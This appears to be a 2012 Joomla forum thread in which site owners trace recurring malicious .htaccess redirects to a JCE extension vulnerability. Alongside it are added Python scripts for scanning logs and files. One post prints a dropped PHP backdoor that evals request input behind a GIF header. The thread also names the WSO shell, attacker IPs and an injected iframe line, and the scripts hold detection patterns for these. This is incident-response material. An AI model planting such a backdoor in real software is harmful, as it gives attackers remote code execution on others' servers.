Got hacked, .htaccess keeps being created

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

mandingueiro
Joomla! Intern
Posts: 90
Joined: Sat Jul 15, 2006 3:09 pm

Got hacked, .htaccess keeps being created

Post by mandingueiro » Wed Aug 29, 2012 11:21 am

Hi there.

My site got hacked, I mean, an .htaccess is being created all the time automatically that redirects the users to another site. I'm trying to find the code that generates it but I can't. My file permissions are fine. And my VM is updated to the last version.
Any help?

Webdongle
Joomla! Master
Posts: 36587
Joined: Sat Apr 05, 2008 9:58 pm

Re: Got hacked, .htaccess keeps being created

Post by Webdongle » Wed Aug 29, 2012 11:44 am

Once you have been hacked you need to do more than just update Joomla. You need to delete all the files on the server and many other things. Before you post please read this

You also need to check the .htaccess that is above the /www folder. If you do not have access to the folder above your site files then contact your Host.

If you have several sites on the same server then the exploit has probably spread to those. So you need to delete all those and rebuild as well.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"The definition of insanity is doing the same thing over and over again, but expecting different results": Albert Einstein

mandingueiro
Joomla! Intern
Posts: 90
Joined: Sat Jul 15, 2006 3:09 pm

Re: Got hacked, .htaccess keeps being created

Post by mandingueiro » Wed Aug 29, 2012 12:43 pm

I've done these things. I had ninjaXplorer installed, this may be the problem. I uninstalled it.

I also reviewed the logs and saw some suspicious POST requests like this:
xxx.xxx.xxx.xxx - - [01/Aug/2012:06:21:45 +0400] "POST /images/stories/.cache_depdnr.php HTTP/1.1" 200 165 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

always coming from the same IP address. I've deleted this file. And I've just found another one in the same folder called story.php with this code

GIF89a1
<?php 
if (isset($_REQUEST['p1'])) {
	eval(stripslashes($_REQUEST['p1']));
} else {
	echo "djeu84m";
}
?>
.

I've also deleted this.

UPDATED: After a lot of googling I've found out that this was a JCE vulnerability.

willy73
Joomla! Fledgling
Posts: 2
Joined: Wed Aug 29, 2012 12:49 pm

Re: Got hacked, .htaccess keeps being created

Post by willy73 » Wed Aug 29, 2012 1:01 pm

Hi. I just registered because I wanted to tell my history and I found this post. It's something like my situation.

I had my htaccess always changing and I couldn't understand why. Then I installed Joomla from scratch but I had the same problems from when I copied the images. I found 2 rows in the access log calling a hidden file under images/banners.

The name of this hidden file was .cache_e1mqoe.php and when I executed it, it asked me for a password. So I opened it and I saw it was Joomla code, but further down there were a lot of nonsense characters. I deleted it.

He came to my server from IP address 5.153.238.253. He always changed the code in the htaccess.

Now I'd like to know what he did and why.... when I didn't understand I got redirected with my iPad, then over Linux or Mac. I think I'll have to look for an antivirus.

Good luck to whoever has the same problem.

mandingueiro
Joomla! Intern
Posts: 90
Joined: Sat Jul 15, 2006 3:09 pm

Re: Got hacked, .htaccess keeps being created

Post by mandingueiro » Wed Aug 29, 2012 1:05 pm

Yes, did you have JCE installed? Turns out it was a JCE vulnerability exploited so they can inject .htaccess files so they can redirect traffic from us to their sites (so they earn money or something I guess). This is the relevant post with the exploit: <removed>

I've then blacklisted these 2 IP addresses (the JCE bot that scans for vulnerable systems and the cracker's IP address) through my cPanel (.htaccess file).
Last edited by mandville on Wed Aug 29, 2012 3:40 pm, edited 1 time in total.
Reason: removed link to hacking method. Relevant info is .....# Title: Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - PHP Version # Vendor: http://www.joomlacontenteditor.net # Vulnerable Version: JCE 2.0.10 (prior versions als

willy73
Joomla! Fledgling
Posts: 2
Joined: Wed Aug 29, 2012 12:49 pm

Re: Got hacked, .htaccess keeps being created

Post by willy73 » Wed Aug 29, 2012 1:12 pm

Thank you mandingueiro. I'm running to uninstall JCE over all my sites.

Thank you very much.

mandingueiro
Joomla! Intern
Posts: 90
Joined: Sat Jul 15, 2006 3:09 pm

Re: Got hacked, .htaccess keeps being created

Post by mandingueiro » Wed Aug 29, 2012 1:14 pm

I believe it's some certain versions that are affected though. I switched to TinyMCE.

roelroel
Joomla! Fledgling
Posts: 3
Joined: Wed Aug 29, 2012 3:51 pm

Re: Got hacked, .htaccess keeps being created

Post by roelroel » Wed Aug 29, 2012 4:23 pm

mandingueiro wrote:Turns out it was a JCE vulnerability exploited
mandingueiro, thank you for your research. A website of mine has become a victim of the same hack. But my Apache access logs don't go back very far. So I can see that WSO is being used via some seemingly random PHP file that has been put in a seemingly random folder. It's called once every hour from IPs 194.44.4.32 and 5.153.238.253. I don't know yet what exactly is posted to WSO. I've set a trap at the moment to log it.

Just curious: How sure are you that it was an exploit in JCE that made the hacker able to put this WSO file on the server? Did you see an IP address accessing JCE at your side? I've updated JCE now btw.

mandingueiro
Joomla! Intern
Posts: 90
Joined: Sat Jul 15, 2006 3:09 pm

Re: Got hacked, .htaccess keeps being created

Post by mandingueiro » Wed Aug 29, 2012 6:46 pm

I've searched the Apache logs for suspicious POST requests. Then I've found out some of them, which were pointing to suspicious PHP hidden files (dotfiles). Then I've seen their code and understood that it was malicious. Then I've searched on Google, and I've found out the certain exploit.
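
The log review described in this post can be automated. The following is an added example, not part of the original posts: it flags successful POST requests to PHP files that are hidden (dotfiles) or sit in upload folders, grouped by client IP. The sample lines are constructed (documentation-range IPs) and the folder list in MEDIA_DIRS is an assumption.

```python
import re
from collections import defaultdict

# Apache combined log format: client IP, timestamp, request line, status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# Folders that should only hold uploads or cache data (assumed list)
MEDIA_DIRS = ("/images/", "/media/", "/tmp/", "/cache/")

def classify(path):
    """Return the reasons a requested path looks like a dropped script."""
    path = path.split("?", 1)[0].lower()
    if not path.endswith(".php"):
        return []
    reasons = []
    if path.rsplit("/", 1)[-1].startswith("."):
        reasons.append("hidden-php")
    if any(d in path for d in MEDIA_DIRS):
        reasons.append("php-in-media-dir")
    return reasons

def suspicious_posts(lines):
    """Group successful (2xx) POSTs to suspicious PHP paths by client IP."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not m["status"].startswith("2"):
            continue
        reasons = classify(m["path"])
        if reasons:
            hits[m["ip"]].append((m["ts"], m["path"], reasons))
    return dict(hits)

UA = '"-" "Mozilla/5.0"'
TS = "[01/Aug/2012:06:21:45 +0400]"
# Constructed sample lines modelled on the request quoted in the thread
SAMPLE = [
    f'192.0.2.10 - - {TS} "POST /images/stories/.cache_depdnr.php HTTP/1.1" 200 165 {UA}',
    f'192.0.2.10 - - {TS} "POST /images/stories/story.php?a=1 HTTP/1.1" 200 7 {UA}',
    f'198.51.100.7 - - {TS} "POST /administrator/index.php HTTP/1.1" 200 900 {UA}',
    f'198.51.100.7 - - {TS} "GET /images/stories/photo.jpg HTTP/1.1" 200 4096 {UA}',
    f'203.0.113.5 - - {TS} "POST /images/banners/.cache_e1mqoe.php HTTP/1.1" 404 210 {UA}',
]

if __name__ == "__main__":
    for ip, rows in suspicious_posts(SAMPLE).items():
        for ts, path, reasons in rows:
            print(ip, ts, path, ",".join(reasons))
```

Only 2xx responses are reported because they show the script exists and answered; the 404 line in the sample is a request for a file that is no longer there.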

Webdongle
Joomla! Master
Posts: 36587
Joined: Sat Apr 05, 2008 9:58 pm

Re: Got hacked, .htaccess keeps being created

Post by Webdongle » Wed Aug 29, 2012 7:07 pm

mandingueiro wrote:I've done these things. ...
Obviously you have not done them correctly because the hack is still there.

Either you did not delete all the files (including files in folders for other sites on the same server)
or
You did not check all computers (that have server/su access) properly
or
You did not change user/passwords
or
You did change user/pass but before deleting all the files and before checking computers for exploits
or
You did not replace the extensions with the latest versions
or
You reinstalled an extension that is vulnerable because you never checked the Vulnerable Extension List properly.
or
You have the wrong chmod on one or more folders/files
or
... one of many other things that was stated in the list.

The usual mistake made is to not delete all the files on the server. People think they can get away with deleting just a few.

mandingueiro
Joomla! Intern
Posts: 90
Joined: Sat Jul 15, 2006 3:09 pm

Re: Got hacked, .htaccess keeps being created

Post by mandingueiro » Wed Aug 29, 2012 7:29 pm

What do you mean "it's still there"? It isn't.

Webdongle
Joomla! Master
Posts: 36587
Joined: Sat Apr 05, 2008 9:58 pm

Re: Got hacked, .htaccess keeps being created

Post by Webdongle » Wed Aug 29, 2012 8:10 pm

mandingueiro wrote:What you mean "it's still there"? It isn't.
mandingueiro wrote:I've done these things. ...

I also reviewed the logs and saw some suspicious POST requests like this:
xxx.xxx.xxx.xxx - - [01/Aug/2012:06:21:45 +0400] "POST /images/stories/.cache_depdnr.php HTTP/1.1" 200 165 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

always coming from the same IP address. I've deleted this file. And I've just found another one in the same folder called story.php with this code
Suggest that either you did not delete all the files on the server ... only the hacks you found
or
You did delete them but you got hacked again.

Sorry if I misinterpreted your post.

roelroel
Joomla! Fledgling
Posts: 3
Joined: Wed Aug 29, 2012 3:51 pm

Re: Got hacked, .htaccess keeps being created

Post by roelroel » Thu Aug 30, 2012 10:50 am

same hack: http://forum.joomla.org/viewtopic.php?f=432&p=2871387

In my case, even after removing and reinstalling latest JCE, I'm stuck with this: when opening an article to edit it from the article manager, a redirect is made to some strange site, similar domain as in the various malicious .htaccess files. But all .htaccess files and two php files (the WSO shell and the djeu84m) are deleted. If JCE is not enabled as editor, everything goes fine.

Any ideas where some residue might be?

Webdongle
Joomla! Master
Posts: 36587
Joined: Sat Apr 05, 2008 9:58 pm

Re: Got hacked, .htaccess keeps being created

Post by Webdongle » Thu Aug 30, 2012 11:35 am

roelroel wrote:...

Any ideas where some residue might be?
If you followed the advice there would be no residue. Delete all the files on your server !!!

roelroel
Joomla! Fledgling
Posts: 3
Joined: Wed Aug 29, 2012 3:51 pm

Re: Got hacked, .htaccess keeps being created

Post by roelroel » Wed Sep 05, 2012 8:12 am

Webdongle wrote: If you followed the advice there would be no residue. Delete all the files on your server !!!
Well, that's true. But it wouldn't teach me anything about the hack either. And who knows, it might come back through another vulnerability which is in the files that I would restore to the server.

Anyway, I just forgot to delete the last .htaccess in the user's home directory; one directory higher than public_html (or www).

Furthermore, FYI, last Friday I saw another site getting hacked with similar symptoms. But this time, also a lot of .js files, JavaScript files, were infected with a "document.write('<iframe src=badsite.com...".
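
An added example, not part of the original posts: a read-only scan, started from the account's home directory rather than public_html, for the artefacts reported in this thread (PHP behind an image header as in story.php, eval of request input, hidden PHP files in media folders, and .htaccess files that redirect to an absolute URL, including one above the web root). The folder names in MEDIA_DIRS and the finding labels are assumptions.

```python
import os
import re
import sys

READ_LIMIT = 256 * 1024                       # bytes inspected per file
IMAGE_MAGIC = (b"GIF8", b"\xff\xd8\xff", b"\x89PNG")
PHP_TAG = re.compile(rb"<\?(php|=)", re.I)
# eval()/assert() fed directly from request input, as in the story.php quoted above
EVAL_REQUEST = re.compile(
    rb"\b(eval|assert)\s*\(.{0,80}\$_(REQUEST|POST|GET|COOKIE)", re.I | re.S)
# .htaccess directives that send visitors to an absolute URL
EXT_REDIRECT = re.compile(
    rb"^\s*(RewriteRule|Redirect(Match)?|ErrorDocument)\b[^\n]*https?://", re.I | re.M)
MEDIA_DIRS = {"images", "media", "tmp", "cache"}   # assumed upload/cache folders

def inspect(full, rel):
    """Return findings for one file; rel is its path relative to the scan root."""
    name = os.path.basename(rel)
    with open(full, "rb") as fh:
        data = fh.read(READ_LIMIT)
    if name == ".htaccess":
        return ["htaccess-external-redirect"] if EXT_REDIRECT.search(data) else []
    findings = []
    has_php = bool(PHP_TAG.search(data))
    if has_php and data.startswith(IMAGE_MAGIC):
        findings.append("image-header-with-php")
    if has_php and EVAL_REQUEST.search(data):
        findings.append("eval-of-request-input")
    if name.lower().endswith(".php"):
        if name.startswith("."):
            findings.append("hidden-php")
        if MEDIA_DIRS & set(rel.split(os.sep)[:-1]):
            findings.append("php-in-media-dir")
    return findings

def scan(root):
    """Walk root (the account home, not just public_html) and map path -> findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                found = inspect(full, os.path.relpath(full, root))
            except OSError:
                continue                      # unreadable file: skip it
            if found:
                report[os.path.relpath(full, root)] = found
    return report

if __name__ == "__main__":
    for path, found in sorted(scan(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(path, ", ".join(found))
```

A redirect finding is a prompt for review, since a site's own .htaccess may legitimately redirect to its canonical domain.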

Webdongle
Joomla! Master
Posts: 36587
Joined: Sat Apr 05, 2008 9:58 pm

Re: Got hacked, .htaccess keeps being created

Post by Webdongle » Wed Sep 05, 2012 12:16 pm

roelroel wrote:... And who knows, it might come back through another vulnerability which is in the files that I would restore to the server....
Only if you don't reinstall up to date files. ...
...
The fact that you may make the mistake of reinstalling compromised files does not negate that deleting all the files removes compromised files.

Perhaps if you read http://forum.joomla.org/viewtopic.php?p ... 7#p2882047 it may help

